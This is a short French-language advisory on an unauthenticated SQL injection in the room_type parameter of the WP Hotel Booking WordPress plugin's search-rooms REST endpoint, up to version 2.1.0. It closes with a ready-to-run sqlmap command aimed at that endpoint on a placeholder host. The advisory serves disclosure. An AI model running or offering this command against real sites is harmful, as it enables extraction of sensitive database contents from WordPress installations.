
WP Hotel Booking <= 2.1.0 - Injection SQL non authentifiée
WP Hotel Booking <= 2.1.0 - Injection SQL non authentifiée
Le plugin WP Hotel Booking pour WordPress est vulnérable à l'injection SQL via le paramètre room_type du point de terminaison de l'API REST /wphb/v1/rooms/search-rooms dans toutes les versions jusqu'à la 2.1.0 incluse, en raison d'un échappement insuffisant sur le paramètre fourni par l'utilisateur et d'un manque de préparation adéquate de la requête SQL existante. Cela permet à des attaquants non authentifiés d'ajouter des requêtes SQL supplémentaires aux requêtes existantes, pouvant être utilisées pour extraire des informations sensibles de la base de données.
sqlmap -u 'https://www.target.com/wp-json/wphb/v1/rooms/search-rooms?check_in_date=2025-01-01&check_out_date=2025-01-10&adults=4&max_child=0&paged=1&room_type=standard' --dbms='MySQL ' --random-agent